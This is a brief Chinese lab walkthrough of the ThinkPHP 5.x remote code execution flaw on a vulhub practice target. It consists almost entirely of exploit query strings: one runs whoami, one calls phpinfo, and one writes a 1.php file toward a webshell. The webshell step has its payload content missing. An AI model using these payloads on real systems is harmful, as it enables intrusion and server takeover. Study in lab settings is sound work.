Thinkphp(TP)漏洞攻略
Thinkphp5x远程命令执⾏及getshell
靶场:vulhub/thinkphp/5-rce
1,启动环境后进行访问
2,我们可以直接使用工具来操作
也可以使用远程命令/远程代码来执行
远程命令执行
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=whoami
远程代码执行
? s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[ 1][]=-1
3,getshell
在输入框中输入以下内容在根目录生成1.php文件,输出phpinfo
? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=echo "" >>1.php
